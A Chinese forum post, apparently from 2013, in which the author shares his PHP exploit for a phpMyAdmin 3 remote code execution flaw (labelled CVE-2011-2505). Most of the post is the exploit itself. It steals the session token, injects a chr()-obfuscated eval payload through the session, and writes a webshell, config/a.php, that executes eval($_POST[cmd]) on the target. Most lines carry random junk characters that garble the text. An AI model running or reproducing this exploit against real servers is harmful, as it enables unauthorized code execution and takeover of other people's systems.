最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
1 Q3 `. F# S# x; {3 B" H0 S$ l! }+ t& X
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
7 |9 p4 }$ D8 W. n( A$ G5 Z2 ~
" B$ p9 y+ K' c& P& Q首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
' w8 v0 w4 z4 ^/ q9 L' O2 k一是session.auto_start = 1;
0 Q1 u. f5 K9 B& }& R4 E二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。3 g) a% Z+ J& R3 i1 \+ K% f
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
3 L6 O* {+ ]5 } B9 A# a3 L* y! l% v3 P$ D
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。; ?% I& i# R8 t0 L- u* S$ \
( U& U, [1 T9 ^* a- k9 j1 T于是写了这个php版本的exp,代码如下:2 Z/ E8 Q" |; k" r( y
d, B5 ~# B6 B+ w$ l
#!/usr/bin/php* V5 L# T2 ~" t" s6 h
<?php4 w, p# c& V) e% I1 q) v! J4 r
print_r('
z! s, S6 }6 U) P( s+ @+---------------------------------------------------------------------------+; c* S1 m. B' G) F0 y
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
% C8 a+ \3 Q5 wby oldjun(www.oldjun.com)% v: \2 x' G- X. t/ d" X2 k
welcome to www.t00ls.net8 T6 e) Z* `1 ]# k0 |
mail: oldjun@gmail.com
, J9 {0 T$ l! q) ?Assigned CVE id: CVE-2011-25054 F# U( L/ ?2 M& l6 k- K% I) a8 w
+---------------------------------------------------------------------------+, O2 x/ r; D! [) d7 c, g7 Q
');
1 D' M; Z) X/ C' N) {# X9 x" b4 H2 t: M
/ v4 Y- {9 g' J9 j3 f% g/**
6 R( f, [' ]. K0 V0 q * working when the directory:"config" exists and is writeable.
% e: _5 i5 V+ e6 B) t7 [$ Y6 V**/3 |7 F* m. l4 N2 Q9 h
! p" Y+ R0 |; i% x9 i
if ($argc < 3) {1 x/ z, |4 m1 n! Z/ m; o/ l/ C
print_r('* o% K$ ^/ Z8 Y+ T) w: T9 J/ F
+---------------------------------------------------------------------------+7 G& v6 }) Z8 K7 a4 M$ f
Usage: php '.$argv[0].' host path5 }9 Y2 {: V" \8 W# F+ m+ d3 n
host: target server (ip/hostname)
, |2 ]; y7 u9 {path: path to pma3
! P& p7 T% T" C; _8 U0 E, TExample:& h& v4 t) E L- ]
php '.$argv[0].' localhost /pma/9 X6 E& D' d, }' |) ~
+---------------------------------------------------------------------------+" l+ ^9 i% }" y( G7 p0 }
');+ D, i6 ]4 a; B* D4 j3 k2 s
exit;1 j+ q, i' A o6 R, f2 S+ D
}1 v- n8 T( \9 ^' V0 N
9 ?/ X# X3 R1 {6 \4 C$host = $argv[1];
5 |2 f# Q6 ]7 D$ ~2 p$path = $argv[2];
- H5 o6 W1 f! Q' r( S9 g3 _
+ D% d& r, F1 g- ~/**
9 M& a" l. D3 M * Try to determine if the directory:"config" exists6 A: O/ p' p6 V7 P& X0 Y0 R3 O/ M
**/
! U/ ]2 j! j7 {2 [' zecho "[+] Try to determine if the directory:config exists....\n";" f$ C2 x* W0 |. B+ n: j
$returnstr=php_request('config/');
8 {6 i; p7 c( U$ s7 _9 }! N( x5 iif(strpos($returnstr,'404')){
! A* I( w" m6 L$ y exit("[-] Exploit Failed! The directory:config do not exists!\n");
" e9 S7 ~0 B* }- |4 C' N& a! @" v}" Q' x- ]4 U8 L7 R- Q: I
% o5 O9 `9 S9 M1 o/**
3 d, N% [1 p/ J1 `' \& L- j * Try to get token and sessionid- O. u" a/ q, Z+ I
**/
/ k" T$ H6 ]0 K% `echo "[+] Try to get token and sessionid....\n";4 s; F1 @2 u% ^- z
$result=php_request('index.php');
% R- D4 ~" b$ Ypreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
( w% S9 F" J8 H$token=$resp[3];, U7 u4 q$ q5 A! G" C7 k
$sessionid=$resp[1];
" F- P% h w( @% }9 ~+ Kif($token && $sessionid){7 E3 Y% `2 @6 K r, S) ^: C: a4 }
echo "[+] token token\n";
v- n. J) b- m7 q4 g8 I echo "[+] Session IDsessionid\n";- c5 x+ P4 c0 n# D
}else{
3 R, l& H0 |+ ^7 [( b& K: k, O exit("[-] Can't get token and Session ID,Exploit Failed!\n");% A5 v: N/ _) l; _+ }* d- _5 a
}$ X+ R4 t, J$ p! T/ M; S
# }3 c5 A$ Y( V' X' A7 }
/**
% Y1 l$ f6 W1 i: p5 h Q * Try to insert shell into session2 {; O0 W7 o) q
**/
' l# f( J" i/ N- Uecho "[+] Try to insert shell into session....\n";( f6 U- d3 @$ l& q* c2 N1 I
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.0 g6 P9 n; @6 a2 M$ m+ q8 {3 L
, t* O! m3 [* q7 e3 F/** i+ {$ P) e: E1 W( t) \4 D
* Try to create webshell' R, y1 {5 f* ?* R* [
**/
1 [: `" b% ~% p8 ^echo "[+] Try to create webshell....\n";" d: Q' s6 E& X2 h
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);9 W$ i4 L' S% y6 `3 I# A- i9 Y
/**
; S2 {! j5 {+ @ f; @( t * Try to check if the webshell was created successfully( _ X: E1 t# e% ]
**/
9 Q/ h5 d' `; k; ~3 p* [; r/ recho "[+] Try to check if the webshell was created successfully....\n";
1 F' l3 x2 L, R* V( t* V) d, e$content=php_request('config/config.inc.php');
2 @) P5 B' I: r1 C" z) y' Cif(strpos($content,'t00ls')){8 N; p b+ N1 N' N
echo "[+] Congratulations! Expoilt successfully....\n";
" _" V1 z5 S+ M: L echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
2 P8 T5 w8 j+ x}else{
$ ^ H$ e5 M& s4 {. W exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");: l5 W; r2 L$ G. c6 r- A" }
} X3 ? C! @2 m$ Z1 Y
" ^3 ^! S+ b5 p' K2 O
function php_request($url,$data='',$cookie=''){4 U7 s! Q: J+ M. Q
global $host, $path;
. D5 g% s6 k5 p r! [
- x* Z) g1 ]: O' i $method=$data?'POST':'GET';
! R4 b8 `- B% l1 I( |) K+ a4 Z9 ?
1 k5 R' H _, m6 A: Z $packet = $method." ".$path.$url." HTTP/1.1\r\n";! T9 O1 f2 A) D6 {: W
$packet .= "Accept: */*\r\n"; I8 z5 z! w7 i, p+ I
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";- }6 Y0 L6 \( F! F7 Y( V0 n
$packet .= "Host: $host\r\n";
3 e4 h% O, O5 q$ o $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
( l5 T( z4 ~% W! E# ? $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";' h2 M+ x0 |7 B; F/ A8 l* r
$packet .= $cookie?"Cookie: $cookie\r\n":"";7 X; x. m# }$ Y) z
$packet .= "Connection: Close\r\n\r\n";
, l0 P" P$ r* G. \2 B/ q7 w $packet .= $data?$data:"";
" F" ^4 Q% i9 k' C4 `4 Q& l) X2 A+ F% j& j: u i
$fp = fsockopen(gethostbyname($host), 80);% q% j/ |8 q* f& }, U$ ^* O
if (!$fp) {
* L8 x7 ~' a& c! c @ echo 'No response from '.$host; die;2 O$ I# q( e' b# Z
}
9 K6 ^) X2 D% _; g fputs($fp, $packet);
7 n0 ^' d6 k3 T# |+ j9 E- P4 m. v; h! B! W$ w
$resp = '';
0 M* U6 A6 H) d( M. w- o$ F' C) s$ K. w4 r/ P; ]# C
while ($fp && !feof($fp))
$ A5 g7 {# L7 q7 X $resp .= fread($fp, 1024);
8 t0 u# L" K9 s" T' {* ]9 _8 @
7 j4 `1 t7 _: F- f, M8 [7 K return $resp;
$ j& J: i7 U' @! L3 S}, W! a, v& `* `( ?: G, I, H
" o0 g# C1 s- k* Q) W. V
?> 8 x% T5 R$ X" v; t7 U' p+ @
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对